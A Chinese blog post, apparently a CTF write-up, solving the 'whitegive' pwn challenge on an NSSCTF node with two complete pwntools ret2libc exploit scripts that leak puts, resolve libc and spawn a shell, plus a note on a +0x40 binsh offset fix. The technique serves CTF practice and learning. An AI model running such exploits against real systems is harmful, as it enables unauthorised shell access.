请注意,本文编写于 630 天前,最后修改于 630 天前,其中某些信息可能已经过时。
目录
检查:
exp
pythonfrom pwn import*
from LibcSearcher import*
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','split','-h'])
io = remote('node2.anna.nssctf.cn',28091)
#io = process('./whitegive')
elf = ELF('./whitegive')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x0400763
payload = b'a'*(0x10+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh=libc_base + libc.dump('str_bin_sh')
payload = b'a'*(0x10+8)+p64(pop_rdi)+p64(binsh)+p64(system)
io.send(payload)
io.interactive()
这题做得有点折磨:
找到的libc版本一直错误,error:sh: 1: d: not found
有点难受,后面看大佬们的wp和讨论,说是libcsearcher搜到的版本与实际版本不一样导致,实际的binsh的偏移还要再搜到的基础上+0x40
所以最后exp:
pythonfrom pwn import*
from LibcSearcher import*
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','split','-h'])
io = remote('node2.anna.nssctf.cn',28091)
#io = process('./whitegive')
elf = ELF('./whitegive')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main = elf.symbols['main']
pop_rdi = 0x0400763
payload = b'a'*(0x10+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
io.sendline(payload)
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system = libc_base + libc.dump('system')
binsh=libc_base + libc.dump('str_bin_sh')
payload = b'a'*(0x10+8)+p64(pop_rdi)+p64(binsh+0x40)+p64(system)
io.send(payload)
io.interactive()
如果对你有用的话,可以打赏哦
打赏
本文作者:Hyrink
本文链接:
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
目录